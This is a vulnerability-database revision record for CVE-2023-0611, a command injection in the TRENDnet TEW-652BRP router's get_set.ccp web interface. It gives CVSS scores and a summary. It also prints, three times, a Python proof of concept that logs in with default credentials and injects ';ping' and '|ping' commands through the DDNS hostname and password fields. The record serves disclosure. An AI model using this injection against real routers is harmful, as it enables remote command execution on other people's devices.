フィールド | 2023年02月01日 14:29 | 2023年03月01日 11:04 | 2023年03月01日 11:09 |
---|
cvss2_vuldb_ii | C | C | C |
cvss2_vuldb_ai | C | C | C |
cvss2_vuldb_e | POC | POC | POC |
cvss2_vuldb_rc | C | C | C |
cvss2_vuldb_au | S | S | S |
cvss2_vuldb_rl | ND | ND | ND |
cvss3_vuldb_rl | X | X | X |
cvss2_vuldb_basescore | 9.0 | 9.0 | 9.0 |
cvss2_vuldb_tempscore | 8.1 | 8.1 | 8.1 |
cvss3_vuldb_basescore | 8.8 | 8.8 | 8.8 |
cvss3_vuldb_tempscore | 8.3 | 8.3 | 8.3 |
cvss3_meta_basescore | 8.8 | 8.8 | 8.8 |
cvss3_meta_tempscore | 8.3 | 8.3 | 8.6 |
price_0day | $0-$5k | $0-$5k | $0-$5k |
vendor | TRENDnet | TRENDnet | TRENDnet |
name | TEW-652BRP | TEW-652BRP | TEW-652BRP |
version | 3.04B01 | 3.04B01 | 3.04B01 |
component | Web Management Interface | Web Management Interface | Web Management Interface |
file | get_set.ccp | get_set.ccp | get_set.ccp |
cwe | 77 (特権昇格) | 77 (特権昇格) | 77 (特権昇格) |
risk | 2 | 2 | 2 |
cvss3_vuldb_av | N | N | N |
cvss3_vuldb_ac | L | L | L |
cvss3_vuldb_pr | L | L | L |
cvss3_vuldb_ui | N | N | N |
cvss3_vuldb_s | U | U | U |
cvss3_vuldb_c | H | H | H |
cvss3_vuldb_i | H | H | H |
cvss3_vuldb_a | H | H | H |
cvss3_vuldb_e | P | P | P |
cvss3_vuldb_rc | C | C | C |
availability | 1 | 1 | 1 |
publicity | 1 | 1 | 1 |
cve | CVE-2023-0611 | CVE-2023-0611 | CVE-2023-0611 |
responsible | VulDB | VulDB | VulDB |
date | 1675206000 (2023年02月01日) | 1675206000 (2023年02月01日) | 1675206000 (2023年02月01日) |
cvss2_vuldb_av | N | N | N |
cvss2_vuldb_ac | L | L | L |
cvss2_vuldb_ci | C | C | C |
language | Python | Python | Python |
sourcecode | import requests,socket
import re
import time
from urllib.parse import urlencode
username = 'admin'
password = 'admin'
device_web_ip = '192.168.10.1'
ping_target_ip = '192.168.10.2'
headers = {'Host': '{}'.format(device_web_ip),
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://{}'.format(device_web_ip),
'Connection': 'keep-alive',
'Referer': 'http://{}/ping_test.htm'.format(device_web_ip),
'Upgrade-Insecure-Requests': '1'}
login_params = 'html_response_page=login_fail.htm&login_name=&username={0}&password={1}&curr_language=0&login_n={0}&login_pass={1}&lang_select=0&login=Login'.format(username,password)
login_url = 'http://{}/login.ccp'.format(device_web_ip)
r = requests.post(url=login_url, data=login_params, headers=headers, timeout=0.2)
if r is None or r.status_code != 200:
print('Login wrong, please retry!')
exit()
params = {
'ccp_act': 'set',
'ccpSubEvent': 'CCP_SUB_DDNS',
'nextPage': 'ddns.htm',
'ddnsCfg_DDNSEnable_1.1.0.0.0': 1,
'ddnsCfg_DDNSServer_1.1.0.0.0': 'dynupdate.no-ip.com',
'ddnsCfg_HostName_1.1.0.0.0': ';ping -c 1 {};'.format(ping_target_ip),
'ddnsCfg_Username_1.1.0.0.0': 'admin',
'ddnsCfg_Password_1.1.0.0.0': '|ping -c 1 {}'.format(ping_target_ip),
'ddnsCfg_Timeout_1.1.0.0.0': ''
}
method = 'POST'
url = 'http://{}/get_set.ccp'.format(device_web_ip)
try:
r = requests.request(method=method,url=url,headers=headers,data=params,verify=False,timeout=0.2)
except Exception as e:
pass | import requests,socket
import re
import time
from urllib.parse import urlencode
username = 'admin'
password = 'admin'
device_web_ip = '192.168.10.1'
ping_target_ip = '192.168.10.2'
headers = {'Host': '{}'.format(device_web_ip),
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://{}'.format(device_web_ip),
'Connection': 'keep-alive',
'Referer': 'http://{}/ping_test.htm'.format(device_web_ip),
'Upgrade-Insecure-Requests': '1'}
login_params = 'html_response_page=login_fail.htm&login_name=&username={0}&password={1}&curr_language=0&login_n={0}&login_pass={1}&lang_select=0&login=Login'.format(username,password)
login_url = 'http://{}/login.ccp'.format(device_web_ip)
r = requests.post(url=login_url, data=login_params, headers=headers, timeout=0.2)
if r is None or r.status_code != 200:
print('Login wrong, please retry!')
exit()
params = {
'ccp_act': 'set',
'ccpSubEvent': 'CCP_SUB_DDNS',
'nextPage': 'ddns.htm',
'ddnsCfg_DDNSEnable_1.1.0.0.0': 1,
'ddnsCfg_DDNSServer_1.1.0.0.0': 'dynupdate.no-ip.com',
'ddnsCfg_HostName_1.1.0.0.0': ';ping -c 1 {};'.format(ping_target_ip),
'ddnsCfg_Username_1.1.0.0.0': 'admin',
'ddnsCfg_Password_1.1.0.0.0': '|ping -c 1 {}'.format(ping_target_ip),
'ddnsCfg_Timeout_1.1.0.0.0': ''
}
method = 'POST'
url = 'http://{}/get_set.ccp'.format(device_web_ip)
try:
r = requests.request(method=method,url=url,headers=headers,data=params,verify=False,timeout=0.2)
except Exception as e:
pass | import requests,socket
import re
import time
from urllib.parse import urlencode
username = 'admin'
password = 'admin'
device_web_ip = '192.168.10.1'
ping_target_ip = '192.168.10.2'
headers = {'Host': '{}'.format(device_web_ip),
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://{}'.format(device_web_ip),
'Connection': 'keep-alive',
'Referer': 'http://{}/ping_test.htm'.format(device_web_ip),
'Upgrade-Insecure-Requests': '1'}
login_params = 'html_response_page=login_fail.htm&login_name=&username={0}&password={1}&curr_language=0&login_n={0}&login_pass={1}&lang_select=0&login=Login'.format(username,password)
login_url = 'http://{}/login.ccp'.format(device_web_ip)
r = requests.post(url=login_url, data=login_params, headers=headers, timeout=0.2)
if r is None or r.status_code != 200:
print('Login wrong, please retry!')
exit()
params = {
'ccp_act': 'set',
'ccpSubEvent': 'CCP_SUB_DDNS',
'nextPage': 'ddns.htm',
'ddnsCfg_DDNSEnable_1.1.0.0.0': 1,
'ddnsCfg_DDNSServer_1.1.0.0.0': 'dynupdate.no-ip.com',
'ddnsCfg_HostName_1.1.0.0.0': ';ping -c 1 {};'.format(ping_target_ip),
'ddnsCfg_Username_1.1.0.0.0': 'admin',
'ddnsCfg_Password_1.1.0.0.0': '|ping -c 1 {}'.format(ping_target_ip),
'ddnsCfg_Timeout_1.1.0.0.0': ''
}
method = 'POST'
url = 'http://{}/get_set.ccp'.format(device_web_ip)
try:
r = requests.request(method=method,url=url,headers=headers,data=params,verify=False,timeout=0.2)
except Exception as e:
pass |
cve_assigned | | 1675206000 (2023年02月01日) | 1675206000 (2023年02月01日) |
cve_nvd_summary | | A vulnerability, which was classified as critical, has been found in TRENDnet TEW-652BRP 3.04B01. This issue affects some unknown processing of the file get_set.ccp of the component Web Management Interface. The manipulation leads to command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-219935. | A vulnerability, which was classified as critical, has been found in TRENDnet TEW-652BRP 3.04B01. This issue affects some unknown processing of the file get_set.ccp of the component Web Management Interface. The manipulation leads to command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-219935. |
cvss3_nvd_av | | | N |
cvss3_nvd_ac | | | L |
cvss3_nvd_pr | | | L |
cvss3_nvd_ui | | | N |
cvss3_nvd_s | | | U |
cvss3_nvd_c | | | H |
cvss3_nvd_i | | | H |
cvss3_nvd_a | | | H |
cvss2_nvd_av | | | N |
cvss2_nvd_ac | | | L |
cvss2_nvd_au | | | S |
cvss2_nvd_ci | | | C |
cvss2_nvd_ii | | | C |
cvss2_nvd_ai | | | C |
cvss3_cna_av | | | N |
cvss3_cna_ac | | | L |
cvss3_cna_pr | | | L |
cvss3_cna_ui | | | N |
cvss3_cna_s | | | U |
cvss3_cna_c | | | H |
cvss3_cna_i | | | H |
cvss3_cna_a | | | H |
cve_cna | | | VulDB |
cvss2_nvd_basescore | | | 9.0 |
cvss3_nvd_basescore | | | 8.8 |
cvss3_cna_basescore | | | 8.8 |